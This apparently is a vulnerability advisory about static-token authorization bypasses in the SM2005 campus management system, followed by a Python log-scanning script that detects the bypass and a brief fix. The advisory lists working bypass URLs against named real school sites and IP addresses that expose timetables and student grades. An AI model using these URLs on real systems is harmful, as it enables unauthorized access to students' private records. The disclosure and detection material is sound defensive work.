Multiple authorization bypasses in a generic campus management system

2015-02-16T00:00:00
ID SSV:95854
Type seebug
Reporter Root
Modified 2015-02-16T00:00:00

Description

Brief description:

See details

Detailed description:

Proof of vulnerability:

Saw someone else's submission on WooYun and took a look. Keyword: SM2005/
Multiple authorization bypasses:

First: without logging in, the class timetable of any teacher for any semester can be viewed.
Vulnerable location: SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
Examples:
http://www.sdwhys.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
http://www.zjnksyzx.com:8801/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
http://www.lcxyz.com:21245/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
http://www.suyaxing.com:81/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
http://www.hwsyxx.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
http://www.dlwsxx.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb
Taking http://221.203.169.188/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb as an example:

<img src="https://images.seebug.org/upload/201502/1111173540ca698ad40a277043c81f6c64f7f000.png" alt="1.png" width="600">

Second: without logging in, any student's grades can be viewed (given that student's ID-card number).
Vulnerable location: http://58.56.38.170/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
Examples:
http://www.sdwhys.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
http://www.suyaxing.com:81/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
http://www.hwsyxx.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
http://www.dlwsxx.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb
e.g.: http://58.56.38.170/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb

<img src="https://images.seebug.org/upload/201502/11111808a48c902c918df9562ce18641271afb5c.png" alt="1.png" width="600">

Third: without logging in, the timetable of any class can be viewed.
Vulnerable location: SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
Examples:
http://www.sdwhys.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
http://www.zjnksyzx.com:8801/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
http://www.lcxyz.com:21245/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
http://www.suyaxing.com:81/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
http://www.hwsyxx.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
http://www.dlwsxx.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb
etc.
e.g.: http://218.26.67.184:8080/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb

<img src="https://images.seebug.org/upload/201502/1111184419da9c0ad400551d9a11ac01efdcf9bb.png" alt="1.png" width="600">
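All three findings above share one root cause: the student-facing SM2005 pages accept a fixed query-string value (sYanzheng=suyaxingweb) in place of a logged-in session, so the check can be satisfied by anyone who knows the constant. The following detection sketch is an added example written for this page; it is not code from the advisory or from the SM2005 product. It scans IIS W3C-style web-server log lines (the lines below are constructed for illustration) for requests to the three endpoints named in the advisory that carry the static token but arrive without a session cookie. The assumption that an authenticated user would hold a classic-ASP `ASPSESSIONID*` cookie is a guess about the deployment, not a fact from the page; adjust the cookie pattern to whatever the real application sets.

```python
"""
Flag requests to the SM2005 endpoints from this advisory that rely only on
the static sYanzheng parameter and carry no session cookie.

Log format assumed (IIS W3C, 8 whitespace-separated fields):
  date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
All log lines below are CONSTRUCTED sample data for this example.
"""
import re
from urllib.parse import parse_qs

# Endpoint paths named in the advisory. IIS matches paths case-insensitively,
# so compare in lower case.
VULNERABLE_STEMS = {
    "/sm2005/student/stukb/teakb.asp",
    "/sm2005/student/stucj/stuscorequery.asp",
    "/sm2005/student/stukb/classkb.asp",
}
STATIC_TOKEN_PARAM = "sYanzheng"   # parameter name from the advisory
STATIC_TOKEN_VALUE = "suyaxingweb" # fixed value from the advisory

# ASSUMPTION: a logged-in user carries a classic-ASP session cookie.
SESSION_COOKIE_RE = re.compile(r"\bASPSESSIONID[A-Z]*=")

# Constructed sample log: two token-only hits, one session-backed request,
# one unrelated page, and one attempt with a wrong token value.
SAMPLE_LOG = """\
2015-02-11 11:11:17 203.0.113.7 GET /SM2005/student/StuKB/TeaKB.asp sYanzheng=suyaxingweb 200 -
2015-02-11 11:12:02 203.0.113.7 GET /SM2005/student/StuCJ/StuScoreQuery.asp sYanzheng=suyaxingweb 200 -
2015-02-11 11:13:40 198.51.100.4 GET /SM2005/student/StuKB/ClassKB.asp sYanzheng=suyaxingweb 200 ASPSESSIONIDQABCDEF=ABC123
2015-02-11 11:14:05 198.51.100.4 GET /SM2005/index.asp - 200 ASPSESSIONIDQABCDEF=ABC123
2015-02-11 11:15:22 192.0.2.9 GET /SM2005/student/StuKB/TeaKB.asp sYanzheng=other 302 -
"""


def parse_line(line):
    """Split one W3C log line into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 8:
        return None
    date, time, ip, method, stem, query, status, cookie = parts
    return {
        "timestamp": f"{date} {time}",
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": query,
        "status": status,
        "cookie": cookie,
    }


def has_session_cookie(cookie_field):
    """True if the cs(Cookie) field carries a session cookie ('-' means none)."""
    return cookie_field != "-" and SESSION_COOKIE_RE.search(cookie_field) is not None


def is_static_token_bypass(entry):
    """True when a vulnerable endpoint is hit with the static token and no session."""
    if entry["stem"].lower() not in VULNERABLE_STEMS:
        return False
    params = parse_qs(entry["query"]) if entry["query"] != "-" else {}
    token = params.get(STATIC_TOKEN_PARAM, [None])[0]
    return token == STATIC_TOKEN_VALUE and not has_session_cookie(entry["cookie"])


def find_bypasses(log_text):
    """Return the parsed entries that look like unauthenticated token-only access."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None and is_static_token_bypass(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_bypasses(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['stem']} status={hit['status']}")
```

Run against the constructed sample, the script reports the first two lines only: the third request carries a session cookie, the fourth is not one of the listed endpoints, and the fifth presents a different token. On the application side, the corresponding fix is to stop treating a constant query parameter as proof of identity and to require a server-side session (or an equivalent per-user credential) before serving timetables or grades.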